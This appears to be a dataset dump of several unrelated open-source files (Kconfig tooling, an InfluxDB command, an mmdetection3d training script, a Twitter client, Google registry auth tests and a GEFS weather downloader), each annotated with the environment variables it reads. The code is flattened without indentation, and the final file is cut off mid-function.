# SPDX-License-Identifier: ISC
# Refer to scripts/kconfig/LICENSE.kconfiglib for the permission notice.
import kconfiglib
def usage():
sys.stdout.write("%s: <Kconfig file> <.config file> [<symbol1>=<value1> ...]\n" % sys.argv[0])
def main():
if len(sys.argv) < 3:
usage()
sys.exit(1)
kconfig_path = sys.argv[1]
if not os.path.isfile(kconfig_path):
sys.stderr.write("Cannot find file %s\n" % kconfig_path)
sys.exit(1)
kconfig = kconfiglib.Kconfig(kconfig_path)
# Parse the configs specified on cmdline
cmdline_conf = {}
for sym_val in sys.argv[3:]:
if sym_val.find("=") == -1:
continue
sym_name, val = sym_val.split("=")[:2]
if sym_name in kconfig.syms.keys() and val:
cmdline_conf[sym_name] = val
# Determine the base config.
#
# If either
#
# 1. no .config exists, or
# 2. the BOARD in the existing .config is different from the BOARD
# specified in the environment variable
#
# the defconfig will be used as the base config. Otherwise the existing
# .config is used as the base.
#
# If .config does not exist, it is required that Kconfig specifies an
# existing defconfig, otherwise this script will refuse to generate a
# .config.
config_path = sys.argv[2]
defconfig_path = kconfig.defconfig_filename
if defconfig_path and os.path.isfile(defconfig_path):
kdefconfig = kconfiglib.Kconfig(kconfig_path)
kdefconfig.load_config(defconfig_path)
else:
kdefconfig = None
need_update = False
if os.path.isfile(config_path):
kconfig.load_config(config_path)
# The BOARD given by the environment variable may be different from what
# is specified in the corresponding defconfig. So compare the value of
# CONFIG_BOARD directly. This is applicable only when CONFIG_BOARD
# exists in the Kconfig.
if kdefconfig and 'BOARD' in kconfig.syms and \
kconfig.syms['BOARD'].str_value != kdefconfig.syms['BOARD'].str_value:
kconfig = kdefconfig
sys.stdout.write("Overwrite with default configuration based on %s.\n" % defconfig_path)
need_update = True
else:
# Use the existing .config as the base.
#
# Mark need_update if any visible symbol picks a different value
# from what is specified in .config.
for sym in [x for x in kconfig.unique_defined_syms if x.visibility]:
if sym.type in [kconfiglib.BOOL, kconfiglib.TRISTATE]:
picked_value = sym.tri_value
else:
picked_value = sym.str_value
need_update = (picked_value != sym.user_value)
if need_update:
break
else:
# base on a default configuration
if kdefconfig:
kconfig = kdefconfig
sys.stdout.write("Default configuration based on %s.\n" % defconfig_path)
need_update = True
else:
# report an error if no known defconfig exists
sys.stderr.write(".config does not exist and no defconfig available for BOARD %s on SCENARIO %s.\n"
% (os.environ['BOARD'], os.environ['SCENARIO']))
sys.exit(1)
# Update the old .config with those specified on cmdline
#
# Note: the user shall be careful what configuration symbols to overwrite by
# silentoldconfig. After changing a symbol value, the invisible symbols are
# updated accordingly because they always use the default value, while
# visible symbols keep their original value in the old .config. This may
# lead to invalid .config for a specific platform.
#
# Currently it is recommended to use the following update only for
# RELEASE. For PLATFORM reinvoke defconfig is preferred.
for sym_name, val in cmdline_conf.items():
sym = kconfig.syms[sym_name]
if sym.str_value and sym.str_value != val:
kconfig.syms[sym_name].set_value(val)
need_update = True
if need_update:
kconfig.write_config(config_path)
sys.stdout.write("Configuration written to %s.\n" % config_path)
if __name__ == "__main__":
main()
|
[] |
[] |
[
"BOARD",
"SCENARIO"
] |
[]
|
["BOARD", "SCENARIO"]
|
python
| 2 | 0 | |
hue/scripts/fill_template_jinja2.py
|
#!/usr/bin/python
import os, sys
from jinja2 import Template
if len(sys.argv) != 4:
print("Allowed paremeters are 3, the source, destination and environment variable prefix parameters and you are passing %d args" % (len(sys.argv) - 1))
sys.exit(1)
template_file = sys.argv[1]
config_file = sys.argv[2]
env_prefix = sys.argv[3]
print ("template: " + template_file + ", destination: " + config_file + ", env variable prefix: " + env_prefix)
def getEnvironmentVariables(env_prefix):
all_env = os.environ
hue_env = {}
for key in all_env.keys():
if env_prefix in key:
new_key = key.replace(env_prefix + "_", '')
hue_env[new_key] = all_env[key]
return hue_env
if __name__ == "__main__":
template = open(template_file,"r")
template_content = template.read()
template.close()
hue_env = getEnvironmentVariables(env_prefix)
result_content = Template(template_content).render(hue_env)
result = open(config_file,"w")
result.write(result_content)
result.close()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
vendor/github.com/influxdata/influxdb/cmd/influxd/run/command.go
|
// Package run is the run (default) subcommand for the influxd command.
package run
import (
"flag"
"fmt"
"io"
"io/ioutil"
"log"
"os"
"path/filepath"
"runtime"
"strconv"
"time"
"go.uber.org/zap"
)
const logo = `
8888888 .d888 888 8888888b. 888888b.
888 d88P" 888 888 "Y88b 888 "88b
888 888 888 888 888 888 .88P
888 88888b. 888888 888 888 888 888 888 888 888 8888888K.
888 888 "88b 888 888 888 888 Y8bd8P' 888 888 888 "Y88b
888 888 888 888 888 888 888 X88K 888 888 888 888
888 888 888 888 888 Y88b 888 .d8""8b. 888 .d88P 888 d88P
8888888 888 888 888 888 "Y88888 888 888 8888888P" 8888888P"
`
// Command represents the command executed by "influxd run".
type Command struct {
Version string
Branch string
Commit string
BuildTime string
closing chan struct{}
pidfile string
Closed chan struct{}
Stdin io.Reader
Stdout io.Writer
Stderr io.Writer
Logger *zap.Logger
Server *Server
// How to get environment variables. Normally set to os.Getenv, except for tests.
Getenv func(string) string
}
// NewCommand return a new instance of Command.
func NewCommand() *Command {
return &Command{
closing: make(chan struct{}),
Closed: make(chan struct{}),
Stdin: os.Stdin,
Stdout: os.Stdout,
Stderr: os.Stderr,
Logger: zap.NewNop(),
}
}
// Run parses the config from args and runs the server.
func (cmd *Command) Run(args ...string) error {
// Parse the command line flags.
options, err := cmd.ParseFlags(args...)
if err != nil {
return err
}
// Print sweet InfluxDB logo.
fmt.Fprint(cmd.Stdout, logo)
// Mark start-up in log.
cmd.Logger.Info(fmt.Sprintf("InfluxDB starting, version %s, branch %s, commit %s",
cmd.Version, cmd.Branch, cmd.Commit))
cmd.Logger.Info(fmt.Sprintf("Go version %s, GOMAXPROCS set to %d", runtime.Version(), runtime.GOMAXPROCS(0)))
// Write the PID file.
if err := cmd.writePIDFile(options.PIDFile); err != nil {
return fmt.Errorf("write pid file: %s", err)
}
cmd.pidfile = options.PIDFile
// Parse config
config, err := cmd.ParseConfig(options.GetConfigPath())
if err != nil {
return fmt.Errorf("parse config: %s", err)
}
// Apply any environment variables on top of the parsed config
if err := config.ApplyEnvOverrides(cmd.Getenv); err != nil {
return fmt.Errorf("apply env config: %v", err)
}
// Validate the configuration.
if err := config.Validate(); err != nil {
return fmt.Errorf("%s. To generate a valid configuration file run `influxd config > influxdb.generated.conf`", err)
}
if config.HTTPD.PprofEnabled {
// Turn on block and mutex profiling.
runtime.SetBlockProfileRate(int(1 * time.Second))
runtime.SetMutexProfileFraction(1) // Collect every sample
}
// Create server from config and start it.
buildInfo := &BuildInfo{
Version: cmd.Version,
Commit: cmd.Commit,
Branch: cmd.Branch,
Time: cmd.BuildTime,
}
s, err := NewServer(config, buildInfo)
if err != nil {
return fmt.Errorf("create server: %s", err)
}
s.Logger = cmd.Logger
s.CPUProfile = options.CPUProfile
s.MemProfile = options.MemProfile
if err := s.Open(); err != nil {
return fmt.Errorf("open server: %s", err)
}
cmd.Server = s
// Begin monitoring the server's error channel.
go cmd.monitorServerErrors()
return nil
}
// Close shuts down the server.
func (cmd *Command) Close() error {
defer close(cmd.Closed)
defer cmd.removePIDFile()
close(cmd.closing)
if cmd.Server != nil {
return cmd.Server.Close()
}
return nil
}
func (cmd *Command) monitorServerErrors() {
logger := log.New(cmd.Stderr, "", log.LstdFlags)
for {
select {
case err := <-cmd.Server.Err():
logger.Println(err)
case <-cmd.closing:
return
}
}
}
func (cmd *Command) removePIDFile() {
if cmd.pidfile != "" {
if err := os.Remove(cmd.pidfile); err != nil {
cmd.Logger.Error("unable to remove pidfile", zap.Error(err))
}
}
}
// ParseFlags parses the command line flags from args and returns an options set.
func (cmd *Command) ParseFlags(args ...string) (Options, error) {
var options Options
fs := flag.NewFlagSet("", flag.ContinueOnError)
fs.StringVar(&options.ConfigPath, "config", "", "")
fs.StringVar(&options.PIDFile, "pidfile", "", "")
// Ignore hostname option.
_ = fs.String("hostname", "", "")
fs.StringVar(&options.CPUProfile, "cpuprofile", "", "")
fs.StringVar(&options.MemProfile, "memprofile", "", "")
fs.Usage = func() { fmt.Fprintln(cmd.Stderr, usage) }
if err := fs.Parse(args); err != nil {
return Options{}, err
}
return options, nil
}
// writePIDFile writes the process ID to path.
func (cmd *Command) writePIDFile(path string) error {
// Ignore if path is not set.
if path == "" {
return nil
}
// Ensure the required directory structure exists.
if err := os.MkdirAll(filepath.Dir(path), 0777); err != nil {
return fmt.Errorf("mkdir: %s", err)
}
// Retrieve the PID and write it.
pid := strconv.Itoa(os.Getpid())
if err := ioutil.WriteFile(path, []byte(pid), 0666); err != nil {
return fmt.Errorf("write file: %s", err)
}
return nil
}
// ParseConfig parses the config at path.
// It returns a demo configuration if path is blank.
func (cmd *Command) ParseConfig(path string) (*Config, error) {
// Use demo configuration if no config path is specified.
if path == "" {
cmd.Logger.Info("no configuration provided, using default settings")
return NewDemoConfig()
}
cmd.Logger.Info(fmt.Sprintf("Using configuration at: %s", path))
config := NewConfig()
if err := config.FromTomlFile(path); err != nil {
return nil, err
}
return config, nil
}
const usage = `Runs the InfluxDB server.
Usage: influxd run [flags]
-config <path>
Set the path to the configuration file.
This defaults to the environment variable INFLUXDB_CONFIG_PATH,
~/.influxdb/influxdb.conf, or /etc/influxdb/influxdb.conf if a file
is present at any of these locations.
Disable the automatic loading of a configuration file using
the null device (such as /dev/null).
-pidfile <path>
Write process ID to a file.
-cpuprofile <path>
Write CPU profiling information to a file.
-memprofile <path>
Write memory usage information to a file.
`
// Options represents the command line options that can be parsed.
type Options struct {
ConfigPath string
PIDFile string
CPUProfile string
MemProfile string
}
// GetConfigPath returns the config path from the options.
// It will return a path by searching in this order:
// 1. The CLI option in ConfigPath
// 2. The environment variable INFLUXDB_CONFIG_PATH
// 3. The first influxdb.conf file on the path:
// - ~/.influxdb
// - /etc/influxdb
func (opt *Options) GetConfigPath() string {
if opt.ConfigPath != "" {
if opt.ConfigPath == os.DevNull {
return ""
}
return opt.ConfigPath
} else if envVar := os.Getenv("INFLUXDB_CONFIG_PATH"); envVar != "" {
return envVar
}
for _, path := range []string{
os.ExpandEnv("${HOME}/.influxdb/influxdb.conf"),
"/etc/influxdb/influxdb.conf",
} {
if _, err := os.Stat(path); err == nil {
return path
}
}
return ""
}
|
[
"\"INFLUXDB_CONFIG_PATH\""
] |
[] |
[
"INFLUXDB_CONFIG_PATH"
] |
[]
|
["INFLUXDB_CONFIG_PATH"]
|
go
| 1 | 0 | |
IntensityNet_testing/train.py
|
# Copyright (c) OpenMMLab. All rights reserved.
from __future__ import division
import argparse
import copy
import os
import time
import warnings
from os import path as osp
import mmcv
import torch
import torch.distributed as dist
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmdet import __version__ as mmdet_version
from mmdet3d import __version__ as mmdet3d_version
from mmdet3d.apis import init_random_seed, train_model
from mmdet3d.datasets import build_dataset
from mmdet3d.models import build_model
from mmdet3d.utils import collect_env, get_root_logger
from mmdet.apis import set_random_seed
from mmseg import __version__ as mmseg_version
try:
# If mmdet version > 2.20.0, setup_multi_processes would be imported and
# used from mmdet instead of mmdet3d.
from mmdet.utils import setup_multi_processes
except ImportError:
from mmdet3d.utils import setup_multi_processes
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
configpath = "/workspace/mmdetection3d/configs/second/hv_second_secfpn_6x8_80e_kitti-3d-car.py"
parser.add_argument('config', configpath, help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--auto-resume',
action='store_true',
help='resume from the latest checkpoint automatically')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='(Deprecated, please use --gpu-id) number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='(Deprecated, please use --gpu-id) ids of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-id',
type=int,
default=0,
help='number of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=0, help='random seed')
parser.add_argument(
'--diff-seed',
action='store_true',
help='Whether or not set different seeds for different ranks')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file (deprecate), '
'change to --cfg-options instead.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
parser.add_argument(
'--autoscale-lr',
action='store_true',
help='automatically scale lr with the number of gpus')
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.cfg_options:
raise ValueError(
'--options and --cfg-options cannot be both specified, '
'--options is deprecated in favor of --cfg-options')
if args.options:
warnings.warn('--options is deprecated in favor of --cfg-options')
args.cfg_options = args.options
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# set multi-process settings
setup_multi_processes(cfg)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > segment in file > filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.auto_resume:
cfg.auto_resume = args.auto_resume
warnings.warn('`--auto-resume` is only supported when mmdet'
'version >= 2.20.0 for 3D detection model or'
'mmsegmentation verision >= 0.21.0 for 3D'
'segmentation model')
if args.gpus is not None:
cfg.gpu_ids = range(1)
warnings.warn('`--gpus` is deprecated because we only support '
'single GPU mode in non-distributed training. '
'Use `gpus=1` now.')
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids[0:1]
warnings.warn('`--gpu-ids` is deprecated, please use `--gpu-id`. '
'Because we only support single GPU mode in '
'non-distributed training. Use the first GPU '
'in `gpu_ids` now.')
if args.gpus is None and args.gpu_ids is None:
cfg.gpu_ids = [args.gpu_id]
if args.autoscale_lr:
# apply the linear scaling rule (https://arxiv.org/abs/1706.02677)
cfg.optimizer['lr'] = cfg.optimizer['lr'] * len(cfg.gpu_ids) / 8
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# re-set gpu_ids with distributed training mode
_, world_size = get_dist_info()
cfg.gpu_ids = range(world_size)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
# specify logger name, if we still use 'mmdet', the output info will be
# filtered and won't be saved in the log_file
# TODO: ugly workaround to judge whether we are training det or seg model
if cfg.model.type in ['EncoderDecoder3D']:
logger_name = 'mmseg'
else:
logger_name = 'mmdet'
logger = get_root_logger(
log_file=log_file, log_level=cfg.log_level, name=logger_name)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([(f'{k}: {v}') for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
meta['config'] = cfg.pretty_text
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
seed = init_random_seed(args.seed)
seed = seed + dist.get_rank() if args.diff_seed else seed
logger.info(f'Set random seed to {seed}, '
f'deterministic: {args.deterministic}')
set_random_seed(seed, deterministic=args.deterministic)
cfg.seed = seed
meta['seed'] = seed
meta['exp_name'] = osp.basename(args.config)
model = build_model(
cfg.model,
train_cfg=cfg.get('train_cfg'),
test_cfg=cfg.get('test_cfg'))
model.init_weights()
logger.info(f'Model:\n{model}')
datasets = [build_dataset(cfg.data.train)]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
# in case we use a dataset wrapper
if 'dataset' in cfg.data.train:
val_dataset.pipeline = cfg.data.train.dataset.pipeline
else:
val_dataset.pipeline = cfg.data.train.pipeline
# set test_mode=False here in deep copied config
# which do not affect AP/AR calculation later
# refer to https://mmdetection3d.readthedocs.io/en/latest/tutorials/customize_runtime.html#customize-workflow # noqa
val_dataset.test_mode = False
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmdet version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmdet_version=mmdet_version,
mmseg_version=mmseg_version,
mmdet3d_version=mmdet3d_version,
config=cfg.pretty_text,
CLASSES=datasets[0].CLASSES,
PALETTE=datasets[0].PALETTE # for segmentors
if hasattr(datasets[0], 'PALETTE') else None)
# add an attribute for visualization convenience
model.CLASSES = datasets[0].CLASSES
train_model(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"LOCAL_RANK"
] |
[]
|
["LOCAL_RANK"]
|
python
| 1 | 0 | |
twitter.go
|
package main
import (
"net/http"
"os"
"github.com/dghubble/go-twitter/twitter"
"github.com/dghubble/oauth1"
)
// TwitterTrendsSvc accesses twitter
type TwitterTrendsSvc interface {
Trends(woeid int) ([]twitter.Trend, error)
Close()
TweetsFor(string) ([]string, error)
}
type twitterTrends struct {
client *twitter.Client
}
func (tt *twitterTrends) Close() {}
func (tt *twitterTrends) Trends(woeid int) ([]twitter.Trend, error) {
ts, res, err := tt.client.Trends.Place(int64(woeid), nil)
if err != nil || res.StatusCode != http.StatusOK {
return nil, err
}
var trends []twitter.Trend
for _, xyz := range ts {
for _, trend := range xyz.Trends {
trends = append(trends, trend)
}
}
return trends, nil
}
func (tt *twitterTrends) TweetsFor(query string) ([]string, error) {
var tweets []string
search, _, err := tt.client.Search.Tweets(&twitter.SearchTweetParams{
Query: query,
Count: 100,
Lang: "pt",
})
if err != nil {
return nil, err
}
for _, tweet := range search.Statuses {
tweets = append(tweets, tweet.Text)
}
return tweets, nil
}
// NewTwitterTrendsSvc creates a new TwitterTrendsSvc
func NewTwitterTrendsSvc() TwitterTrendsSvc {
return &twitterTrends{
client: newClient(),
}
}
func newClient() *twitter.Client {
consumerKey := os.Getenv("CONSUMER_KEY")
consumerSecret := os.Getenv("CONSUMER_SECRET")
accessToken := os.Getenv("ACCESS_TOKEN")
accessSecret := os.Getenv("ACCESS_SECRET")
config := oauth1.NewConfig(consumerKey, consumerSecret)
token := oauth1.NewToken(accessToken, accessSecret)
client := twitter.NewClient(config.Client(oauth1.NoContext, token))
// Tests connection and crashes app if there is bad auth data
_, _, err := client.Timelines.HomeTimeline(&twitter.HomeTimelineParams{
Count: 20,
})
if err != nil {
panic(err.Error())
}
return client
}
|
[
"\"CONSUMER_KEY\"",
"\"CONSUMER_SECRET\"",
"\"ACCESS_TOKEN\"",
"\"ACCESS_SECRET\""
] |
[] |
[
"CONSUMER_KEY",
"ACCESS_SECRET",
"CONSUMER_SECRET",
"ACCESS_TOKEN"
] |
[]
|
["CONSUMER_KEY", "ACCESS_SECRET", "CONSUMER_SECRET", "ACCESS_TOKEN"]
|
go
| 4 | 0 | |
pkg/v1/google/auth_test.go
|
// +build !arm64
// +build !darwin
// Copyright 2018 Google LLC All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package google
import (
"bytes"
"fmt"
"os"
"os/exec"
"strings"
"testing"
"github.com/google/go-containerregistry/pkg/authn"
"github.com/google/go-containerregistry/pkg/logs"
"github.com/google/go-containerregistry/pkg/name"
"golang.org/x/oauth2"
)
const (
// Fails to parse as JSON at all.
badoutput = ""
// Fails to parse token_expiry format.
badexpiry = `
{
"credential": {
"access_token": "mytoken",
"token_expiry": "most-definitely-not-a-date"
}
}`
// Expires in 6,000 years. Hopefully nobody is using software then.
success = `
{
"credential": {
"access_token": "mytoken",
"token_expiry": "8018-12-02T04:08:13Z"
}
}`
)
// We'll invoke ourselves with a special environment variable in order to mock
// out the gcloud dependency of gcloudSource. The exec package does this, too.
//
// See: https://www.joeshaw.org/testing-with-os-exec-and-testmain/
//
// TODO(#908): This doesn't work on arm64 or darwin for some reason.
func TestMain(m *testing.M) {
switch os.Getenv("GO_TEST_MODE") {
case "":
// Normal test mode
os.Exit(m.Run())
case "error":
// Makes cmd.Run() return an error.
os.Exit(2)
case "badoutput":
// Makes the gcloudOutput Unmarshaler fail.
fmt.Println(badoutput)
case "badexpiry":
// Makes the token_expiry time parser fail.
fmt.Println(badexpiry)
case "success":
// Returns a seemingly valid token.
fmt.Println(success)
}
}
func newGcloudCmdMock(env string) func() *exec.Cmd {
return func() *exec.Cmd {
cmd := exec.Command(os.Args[0])
cmd.Env = []string{fmt.Sprintf("GO_TEST_MODE=%s", env)}
return cmd
}
}
func TestGcloudErrors(t *testing.T) {
cases := []struct {
env string
// Just look for the prefix because we can't control other packages' errors.
wantPrefix string
}{{
env: "error",
wantPrefix: "error executing `gcloud config config-helper`:",
}, {
env: "badoutput",
wantPrefix: "failed to parse `gcloud config config-helper` output:",
}, {
env: "badexpiry",
wantPrefix: "failed to parse gcloud token expiry:",
}}
for _, tc := range cases {
t.Run(tc.env, func(t *testing.T) {
GetGcloudCmd = newGcloudCmdMock(tc.env)
if _, err := NewGcloudAuthenticator(); err == nil {
t.Errorf("wanted error, got nil")
} else if got := err.Error(); !strings.HasPrefix(got, tc.wantPrefix) {
t.Errorf("wanted error prefix %q, got %q", tc.wantPrefix, got)
}
})
}
}
func TestGcloudSuccess(t *testing.T) {
// Stupid coverage to make sure it doesn't panic.
var b bytes.Buffer
logs.Debug.SetOutput(&b)
GetGcloudCmd = newGcloudCmdMock("success")
auth, err := NewGcloudAuthenticator()
if err != nil {
t.Fatalf("NewGcloudAuthenticator got error %v", err)
}
token, err := auth.Authorization()
if err != nil {
t.Fatalf("Authorization got error %v", err)
}
if got, want := token.Password, "mytoken"; got != want {
t.Errorf("wanted token %q, got %q", want, got)
}
}
//
// Keychain tests are in here so we can reuse the fake gcloud stuff.
//
func mustRegistry(r string) name.Registry {
reg, err := name.NewRegistry(r, name.StrictValidation)
if err != nil {
panic(err)
}
return reg
}
func TestKeychainDockerHub(t *testing.T) {
if auth, err := Keychain.Resolve(mustRegistry("index.docker.io")); err != nil {
t.Errorf("expected success, got: %v", err)
} else if auth != authn.Anonymous {
t.Errorf("expected anonymous, got: %v", auth)
}
}
func TestKeychainGCRandAR(t *testing.T) {
cases := []struct {
host string
expectAuth bool
}{
// GCR hosts
{"gcr.io", true},
{"us.gcr.io", true},
{"eu.gcr.io", true},
{"asia.gcr.io", true},
{"staging-k8s.gcr.io", true},
{"global.gcr.io", true},
{"notgcr.io", false},
{"fake-gcr.io", false},
{"alsonot.gcr.iot", false},
// AR hosts
{"us-docker.pkg.dev", true},
{"asia-docker.pkg.dev", true},
{"europe-docker.pkg.dev", true},
{"us-central1-docker.pkg.dev", true},
{"us-docker-pkg.dev", false},
{"someotherpkg.dev", false},
{"looks-like-pkg.dev", false},
{"closeto.pkg.devops", false},
}
// Env should fail.
if err := os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/dev/null"); err != nil {
t.Fatalf("unexpected err os.Setenv: %v", err)
}
for i, tc := range cases {
t.Run(fmt.Sprintf("cases[%d]", i), func(t *testing.T) {
// Reset the keychain to ensure we don't cache earlier results.
Keychain = &googleKeychain{}
// Gcloud should succeed.
GetGcloudCmd = newGcloudCmdMock("success")
if auth, err := Keychain.Resolve(mustRegistry(tc.host)); err != nil {
t.Errorf("expected success for %v, got: %v", tc.host, err)
} else if tc.expectAuth && auth == authn.Anonymous {
t.Errorf("expected not anonymous auth for %v, got: %v", tc, auth)
} else if !tc.expectAuth && auth != authn.Anonymous {
t.Errorf("expected anonymous auth for %v, got: %v", tc, auth)
}
// Make gcloud fail to test that caching works.
GetGcloudCmd = newGcloudCmdMock("badoutput")
if auth, err := Keychain.Resolve(mustRegistry(tc.host)); err != nil {
t.Errorf("expected success for %v, got: %v", tc.host, err)
} else if tc.expectAuth && auth == authn.Anonymous {
t.Errorf("expected not anonymous auth for %v, got: %v", tc, auth)
} else if !tc.expectAuth && auth != authn.Anonymous {
t.Errorf("expected anonymous auth for %v, got: %v", tc, auth)
}
})
}
}
func TestKeychainError(t *testing.T) {
if err := os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/dev/null"); err != nil {
t.Fatalf("unexpected err os.Setenv: %v", err)
}
GetGcloudCmd = newGcloudCmdMock("badoutput")
// Reset the keychain to ensure we don't cache earlier results.
Keychain = &googleKeychain{}
if _, err := Keychain.Resolve(mustRegistry("gcr.io")); err == nil {
t.Fatalf("expected err, got: %v", err)
}
}
type badSource struct{}
func (bs badSource) Token() (*oauth2.Token, error) {
return nil, fmt.Errorf("oops")
}
// This test is silly, but coverage.
func TestTokenSourceAuthError(t *testing.T) {
auth := tokenSourceAuth{badSource{}}
_, err := auth.Authorization()
if err == nil {
t.Errorf("expected err, got nil")
}
}
func TestNewEnvAuthenticatorFailure(t *testing.T) {
if err := os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/dev/null"); err != nil {
t.Fatalf("unexpected err os.Setenv: %v", err)
}
// Expect error.
_, err := NewEnvAuthenticator()
if err == nil {
t.Errorf("expected err, got nil")
}
}
|
[
"\"GO_TEST_MODE\""
] |
[] |
[
"GO_TEST_MODE"
] |
[]
|
["GO_TEST_MODE"]
|
go
| 1 | 0 | |
gefs/door_downloader_nwp_gefs_nomads.py
|
#!/usr/bin/python3
"""
HyDE Downloading Tool - NWP GEFS 0.25
__date__ = '20210914'
__version__ = '1.0.0'
__author__ =
'Andrea Libertino ([email protected]',
'Fabio Delogu ([email protected]',
__library__ = 'HyDE'
General command line:
python3 hyde_downloader_nwp_gefs_nomads.py -settings_file configuration.json -time YYYY-MM-DD HH:MM
Version(s):
20200227 (1.0.0) --> Beta release
"""
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Complete library
import logging
import os
import time
import json
import urllib.request
import tempfile
import xarray as xr
import numpy as np
import pandas as pd
from urllib.request import Request, urlopen
from urllib.error import URLError
from copy import deepcopy
from cdo import Cdo
from multiprocessing import Pool, cpu_count
from datetime import datetime
from os import makedirs
from os.path import join, exists, split
from argparse import ArgumentParser
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Algorithm information
alg_name = 'HYDE DOWNLOADING TOOL - NWP GEFS'
alg_version = '1.0.0'
alg_release = '2021-09-14'
# Algorithm parameter(s)
time_format = '%Y%m%d%H%M'
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Script Main
def main():
# -------------------------------------------------------------------------------------
# Get algorithm settings
alg_settings, alg_time = get_args()
# Set algorithm settings
data_settings = read_file_json(alg_settings)
# Set algorithm logging
make_folder(data_settings['data']['log']['folder'])
set_logging(logger_file=join(data_settings['data']['log']['folder'], data_settings['data']['log']['filename']))
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Info algorithm
logging.info(' ============================================================================ ')
logging.info(' ==> ' + alg_name + ' (Version: ' + alg_version + ' Release_Date: ' + alg_release + ')')
logging.info(' ==> START ... ')
logging.info(' ')
# Time algorithm information
start_time = time.time()
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Get algorithm time range
time_run, time_run_range = set_run_time(alg_time, data_settings['time'])
ens_members = np.arange(1,data_settings["algorithm"]["ancillary"]["ens_members"]+1)
# Starting info
logging.info(' --> TIME RUN: ' + str(time_run))
# Iterate over time steps
for time_run_step in time_run_range:
# Starting info
logging.info(' ---> NWP RUN: ' + str(time_run_step) + ' ... ')
# Iterate over ensemble members
for ens_member in ens_members:
# Starting info
logging.info(' ---> ENSEMBLE MEMBER: ' + str(ens_member).zfill(2) + ' ... ')
# Get data time range
time_data_range = set_data_time(time_run_step, data_settings['data']['dynamic']['time'])
time_data_full = pd.date_range(time_run + pd.Timedelta('1H'), time_data_range[-1], freq='1H')
# Set data sources
data_source = set_data_source(time_run_step, time_data_range, ens_member,
data_settings['data']['dynamic']['source'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],)
# Set data ancillary
data_ancillary = set_data_ancillary(time_run_step, time_data_range, ens_member,
data_settings['data']['dynamic']['ancillary'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
